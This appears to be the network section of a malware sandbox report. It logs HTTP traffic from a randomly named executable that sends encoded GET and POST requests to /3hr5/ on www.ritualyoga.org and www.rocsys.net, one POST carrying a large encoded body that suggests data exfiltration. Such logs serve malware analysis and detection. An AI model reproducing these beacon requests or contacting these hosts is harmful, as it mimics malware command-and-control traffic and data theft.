                                                                                                                              Dec 4, 2023 15:23:18.394366026 CET3912OUTData Raw: 7a 50 32 31 68 65 50 62 6e 69 32 79 71 47 6c 47 4e 79 77 57 4c 46 4a 77 42 49 37 6b 6e 67 42 70 46 46 37 49 54 66 4c 31 48 67 37 55 30 57 47 33 31 71 52 6a 62 6f 70 71 32 6d 2f 70 45 30 4d 4a 64 51 52 76 47 34 50 56 6f 30 77 74 35 6e 67 50 78 76
                                                                                                                              Data Ascii: zP21hePbni2yqGlGNywWLFJwBI7kngBpFF7ITfL1Hg7U0WG31qRjbopq2m/pE0MJdQRvG4PVo0wt5ngPxvkOnaednapi2jTOzSVLQ1KuZHX/y/CtPEXhuhVCvM2aKGZh/P4EouESK0ux0UR43negYx/pjnCpDTtq5eesvi5hNcGMw2PQb8BGi7aUcFR/h+CDw8bqYvAKh4hmuFHKAjnKdv5R4SWjzgehUDQX1XJCrp+FXcAtml/
                                                                                                                              Dec 4, 2023 15:23:18.394443989 CET5962OUTData Raw: 67 45 30 38 48 79 30 61 5a 55 35 55 54 56 51 77 4b 34 42 55 51 2b 66 49 4b 46 64 64 52 4a 57 43 79 44 75 65 66 56 6f 78 39 44 4e 58 48 38 43 38 49 6a 4c 69 66 79 75 45 75 35 68 4c 32 72 78 63 70 59 6b 62 67 34 4a 6f 48 6a 56 66 37 4a 53 6d 7a 65
                                                                                                                              Data Ascii: gE08Hy0aZU5UTVQwK4BUQ+fIKFddRJWCyDuefVox9DNXH8C8IjLifyuEu5hL2rxcpYkbg4JoHjVf7JSmzeVWBQjvigpFzJgmSuj3XTxq8X7sgX1ksHYh+xoAa5Vxd7aGzzlrTPS33KoJu8TMovK07fPzQyeSSzQDZvE1WdPKXDH3q25kWJs4PjAwHYaIvnsElzRdCWcSE/RzNFpg8vKNZTNzNggqGOEqRREPZ30yP5CBC9+3gOH
                                                                                                                              Dec 4, 2023 15:23:18.513305902 CET379INHTTP/1.1 502 Bad Gateway
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:23:18 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 173
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.11.2050139216.40.34.41808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:20.648096085 CET532OUTGET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:23:20.773152113 CET1328INHTTP/1.1 200 OK
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:23:20 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              x-download-options: noopen
                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                              etag: W/"cd0e473ec8f9e0891230436de0f95a52"
                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                              x-request-id: 639a3f42-dcdf-483d-8933-73bc263f07db
                                                                                                                              x-runtime: 0.011616
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 37 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 72 69 74 75 61 6c 79 6f 67 61 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                                                              Data Ascii: 1755<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>ritualyoga.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.
                                                                                                                              Dec 4, 2023 15:23:20.773633003 CET1328INData Raw: 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61
                                                                                                                              Data Ascii: hover.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>ritualyoga.org</h1><h2>is a totally awesome idea still being
                                                                                                                              Dec 4, 2023 15:23:20.773732901 CET1328INData Raw: 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77
                                                                                                                              Data Ascii: "https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></u
                                                                                                                              Dec 4, 2023 15:23:20.773828983 CET1328INData Raw: 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e
                                                                                                                              Data Ascii: 359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.1
                                                                                                                              Dec 4, 2023 15:23:20.773966074 CET1328INData Raw: 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d 37 36 2e 35 20 30 2e 35 74 2d 31 30 35 2e 35 20 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38 74 2d
                                                                                                                              Data Ascii: M768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.
                                                                                                                              Dec 4, 2023 15:23:20.773979902 CET218INData Raw: 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 20 20 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41
                                                                                                                              Data Ascii: nt,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.11.205014037.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:26.404582024 CET795OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 62 74 69 33 50 65 74 42 4b 64 78 6d 2b 64 6c 63 45 36 4d 4b 42 61 72 76 76 36 79 46 39 51 61 47 41 31 65 4d 64 6f 79 6d 68 78 51 6c 74 48 38 6f 41 69 62 59 62 33 66 72 53 76 7a 34 39 50 68 51 66 6a 61 70 79 2b 2b 52 69 77 6b 6b 77 68 68 39 67 67 56 52 36 31 2b 68 4a 72 38 31 70 30 34 6e 49 35 30 4c 4a 58 76 48 36 76 53 57 70 42 67 35 6a 53 4f 38 42 70 39 58 31 4b 6f 6b 31 6b 49 41 46 77 76 61 33 51 57 72 76 68 39 50 6e 42 35 58 35 32 54 49 67 52 66 49 74 6b 4b 69 43 61 77 33 30 59 58 35 70 6e 46 41 6d 48 6d 68 43 63 75 72 41 67 3d 3d
                                                                                                                              Data Ascii: TZd=bti3PetBKdxm+dlcE6MKBarvv6yF9QaGA1eMdoymhxQltH8oAibYb3frSvz49PhQfjapy++Riwkkwhh9ggVR61+hJr81p04nI50LJXvH6vSWpBg5jSO8Bp9X1Kok1kIAFwva3QWrvh9PnB5X52TIgRfItkKiCaw30YX5pnFAmHmhCcurAg==
                                                                                                                              Dec 4, 2023 15:23:26.576653957 CET242INHTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.11.205014137.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:29.103007078 CET1135OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 62 74 69 33 50 65 74 42 4b 64 78 6d 2f 38 56 63 48 64 77 4b 41 36 72 6f 6b 61 79 46 7a 77 61 4b 41 31 61 4d 64 70 32 4d 68 44 45 6c 74 6a 77 6f 42 6e 6e 59 57 58 66 72 61 50 7a 78 6a 2f 68 58 66 6a 48 57 79 2f 43 52 69 77 77 6b 78 53 70 39 6d 51 56 4f 76 46 2b 67 65 62 38 77 2b 45 34 68 49 35 35 6b 4a 54 6e 48 39 66 2b 57 6f 44 34 35 31 54 4f 39 57 4a 39 64 7a 4b 6f 6e 37 45 49 30 46 77 53 6c 33 52 76 63 76 58 64 50 6b 6c 4a 58 2b 47 54 4a 75 68 66 50 6c 45 4c 73 54 35 6f 79 79 2b 6e 36 38 47 4e 75 6a 45 2f 71 50 34 7a 37 62 49 49 59 34 77 34 72 70 48 67 75 2f 43 70 54 6b 2f 38 55 69 62 45 7a 68 50 47 41 71 41 54 38 52 7a 2b 6a 52 43 4f 5a 47 51 4a 54 30 64 7a 56 47 70 6c 58 62 57 4b 47 39 59 69 52 77 49 57 38 72 59 36 78 4a 41 48 69 53 74 7a 59 42 50 58 4a 37 54 50 39 78 42 4a 6e 39 4f 49 2b 37 32 51 59 42 76 4c 47 36 36 35 34 53 44 6f 43 59 30 36 71 71 66 6e 38 4e 32 48 36 5a 36 39 45 59 57 59 6d 38 79 72 76 56 54 61 2b 61 43 72 31 36 30 79 52 4d 6c 6d 49 53 31 41 56 74 46 6d 4c 42 50 76 6b 32 65 59 4f 33 5a 64 71 77 74 76 38 58 33 47 6a 4d 4f 34 58 70 73 67 35 70 53 2b 2f 37 56 33 43 63 47 52 74 7a 59 31 53 36 67 58 4b 42 62 44 61 51 67 31 46 65 37 43 46 69 57 66 5a 74 6d 61 50 73 34 4d 50 6e 4c 75 4e 72 38 33 70 4f 57 2f 4a 44 59 43 43 63 31 37 48 43 36 6c 2b 34 58 6b 38 49 4c 67 6e 74 47 34 70 42 49 6e 2b 55 30 45 75 31 58 74 77 6c 7a 57 38 75 61 76 6a 6d 6a 37 52 75 69 45 75 34 77 67 45 32 36 6e 37 36 59 4d 31 4a 34 51 52 44 5a 53 73 6b 35 31 67 52 31 47 53 4a 75 77 69 54 53 4a 46 4d 34 74 64 5a 6a 46 67 76 6c 6a 79 72 6c 67 3d
                                                                                                                              Data Ascii: TZd=bti3PetBKdxm/8VcHdwKA6rokayFzwaKA1aMdp2MhDEltjwoBnnYWXfraPzxj/hXfjHWy/CRiwwkxSp9mQVOvF+geb8w+E4hI55kJTnH9f+WoD451TO9WJ9dzKon7EI0FwSl3RvcvXdPklJX+GTJuhfPlELsT5oyy+n68GNujE/qP4z7bIIY4w4rpHgu/CpTk/8UibEzhPGAqAT8Rz+jRCOZGQJT0dzVGplXbWKG9YiRwIW8rY6xJAHiStzYBPXJ7TP9xBJn9OI+72QYBvLG6654SDoCY06qqfn8N2H6Z69EYWYm8yrvVTa+aCr160yRMlmIS1AVtFmLBPvk2eYO3Zdqwtv8X3GjMO4Xpsg5pS+/7V3CcGRtzY1S6gXKBbDaQg1Fe7CFiWfZtmaPs4MPnLuNr83pOW/JDYCCc17HC6l+4Xk8ILgntG4pBIn+U0Eu1XtwlzW8uavjmj7RuiEu4wgE26n76YM1J4QRDZSsk51gR1GSJuwiTSJFM4tdZjFgvljyrlg=
                                                                                                                              Dec 4, 2023 15:23:29.280168056 CET242INHTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.11.205014237.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:31.805993080 CET6484OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 62 74 69 33 50 65 74 42 4b 64 78 6d 2f 38 56 63 48 64 77 4b 41 36 72 6f 6b 61 79 46 7a 77 61 4b 41 31 61 4d 64 70 32 4d 68 44 63 6c 73 51 34 6f 41 45 50 59 58 58 66 72 51 76 7a 38 6a 2f 67 53 66 6a 66 53 79 2f 4f 72 69 79 49 6b 78 42 52 39 6d 6d 70 4f 2b 31 2b 30 43 4c 38 32 70 30 35 32 49 35 31 34 4a 54 62 39 36 75 36 57 70 45 63 35 6b 30 53 38 63 35 39 58 7a 4b 6f 72 74 45 49 57 46 77 6d 50 33 52 6a 63 76 52 46 50 6c 55 31 58 75 42 2f 4a 6e 52 66 4d 72 6b 4c 33 4a 4a 70 49 79 34 4b 4c 38 47 4e 2b 6a 47 54 71 50 2f 76 37 61 50 55 62 34 51 34 72 32 33 67 74 70 79 6c 49 6b 2f 68 48 69 65 34 7a 68 4a 43 41 6f 67 54 38 48 69 2b 67 42 53 4f 44 43 51 49 56 2b 39 33 64 47 70 78 74 62 53 47 47 38 6f 47 52 7a 62 2b 38 70 38 75 78 45 41 48 67 63 4e 79 63 4c 76 57 51 37 58 53 65 78 41 6f 63 39 4f 73 2b 68 58 77 59 58 62 6e 42 39 61 35 79 58 44 6f 58 50 45 32 32 71 66 58 57 4e 32 48 71 5a 37 35 45 5a 6d 6f 6d 39 77 50 73 66 54 61 31 54 69 71 76 6f 30 2b 62 4d 6c 72 46 53 31 5a 51 74 43 32 4c 42 76 76 6b 7a 35 6b 4e 39 70 64 74 76 39 75 37 4b 6e 47 77 4d 4f 31 38 70 6f 34 50 70 44 43 2f 35 6c 6e 43 5a 57 52 75 6c 6f 31 4f 7a 41 58 4d 57 72 44 61 51 67 35 33 65 37 47 46 69 43 33 5a 38 47 71 50 71 70 4d 50 6c 4c 75 4c 72 38 33 34 4f 57 79 70 44 59 4b 67 63 31 4b 73 43 35 4a 2b 35 44 67 38 45 71 67 6f 39 6d 34 73 46 49 6d 2b 61 55 49 44 31 57 42 34 6c 7a 47 73 75 73 37 6a 6e 6a 72 52 73 53 45 74 2b 51 67 48 33 36 6e 58 72 49 78 30 4a 34 6b 37 44 59 32 38 6b 2b 78 67 53 53 69 50 52 74 73 76 4a 6c 74 57 4b 50 68 43 52 44 64 75 31 67 33 50 35 43 6c 4c 51 72 4d 57 50 7a 43 2f 42 68 36 2f 37 31 32 79 37 45 46 6e 4d 62 6c 56 79 4f 59 4c 32 71 69 61 4b 75 44 74 32 44 79 35 6e 4f 30 63 41 73 43 7a 66 77 47 4f 6e 39 7a 6b 56 59 4e 35 59 66 71 71 59 63 53 4d 50 41 54 55 61 70 57 32 62 4f 50 34 5a 43 54 51 47 7a 31 68 63 61 31 34 67 69 46 64 67 62 4a 61 68 6e 49 70 65 66 66 33 33 38 30 54 6d 63 4e 59 55 42 53 69 2f 52 43 34 46 6f 76 78 47 4f 50 57 5a 32 5a 76 6a 71 61 74 6b 4a 53 49 34 68 73 39 6d 6b 49 38 32 34 54 4d 73 42 38 52 58 70 78 66 6f 64 4b 2b 50 62 6d 79 52 54 72 4f 32 53 42 53 66 6e 42 77 55 5a 34 74 43 68 76 4a 41 71 77 6a 6a 6c 36 56 6f 34 33 6b 48 79 44 57 6d 48 37 7a 78 66 77 41 68 53 79 4e 38 47 53 4e 31 4b 38 2b 43 67 59 6e 6a 49 6e 4b 39 4e 4d 32 50 50 4c 68 4f 39 4e 4a 48 58 58 4d 33 74 4b 46 58 59 71 57 49 4e 50 53 63 76 61 72 42 4c 73 6d 72 55 63 53 2b 41 47 59 50 32 75 67 7a 45 54 4d 56 43 70 48 49 47 5a 4a 4d 67 72 66 32 31 78 51 49 55 4a 6b 46 39 79 5a 46 56 75 77 4c 75 63 49 7a 2b 48 4b 42 56 39 32 35 34 4e 65 59 72 70 46 4d 49 62 64 69 73 45 55 6d 76 61 4a 48 75 5a 6f 39 36 70 39 47 50 30 32 4d 59 59 36 42 54 32 47 6f 4f 7a 64 74 51 68 4f 45 2b 4d 6d 54 4b 4a 71 72 59 43 49 77 75 69 57 34 6b 63 75 2f 4b 6d 2f 71 67 38 72 55 44 74 31 32 2f 45 6f 4c 41 37 2b 6d 6a 6a 79 4e 76 34 73 31 30 58 57 39 66 41 2b 76 59 47 71 6b 6b 33 4b 66 76 64 6c 5a 6d 56 64 43 47 53 73 42 44 74 66 6e 7a 35 2f 56 73 61 64 77 62 54 47 30 6b 4b 6e 42 49 71 69 76 56 73 68 31 30 79 42 61 41 63 4d 72 6c 51 74 5a 6a 56 42 68 34 54 31 6e 6c 42 76 46 68 6e 58 4b 31 42 41 54 37 42 6d 52 38 48 6a 74 66 44 75 4a 33 6d 75 43 4e 61 65 4f 57 59 6a 45 4d 79 6b 34 61 52 53 72 2b 69 57 67 31 2f 66 7a 74 54 48 32 6b 30 68 39 4d 33 75 6e 38 4c 68 5a 79 77 2b 4e 67 70 6c 68 67 67 6d 56 70 69 42 58 4e 36 56 6b 68 34 47 69 67 79 76 61 56 68 43 63 69 50 37 53 70 59 59 6d 36 59 61 4b 4f 39 31 6b 69 5a 43 6c 36 31 61 46 6c 49 41 75 70 34 30 53 52 43 33 69 57 4a 6a 4c 62 42 45 53 4a 48 43 30 67 53 30 58 49 4b 46 70 2f 67 65 55 34 49 2f 49 77 54 41 41 59 30 50 55 69 46 62 53 7a 72 59 53 50 65 44 54 67 66 64 6a 4f 6f 66 79 58 58 41 54 46 33 52 6f 63 42 4a 31 6e 54 46 70 61 6e 72 68 65 41 54 56 4c 70 6e 75 73 69 71 77 45 4a 52 65 6b 32 43 4d 42 4e 70 37 56 4f 4f 68 71 77 32 71 55 46 67 4d 6e 6c 58 45 47 38 43 55 63 33 46 46 51 36 34 76 32 76 58 71 79 44 56 46 43 64 37 75 47 53 75 71 66 52 7a 52 56 6f 2f 58 6f 4d 49 50 70 6e 51 4b 6c 52 51 54 47 52 63 6c 72 71 67 63 4d 61 54 49 4e 55 62 79 62 54 6d 72 4e 48 5a 4c 48 7a 72 63 53 51 4e 4f 35 2f 4d 56 35 58
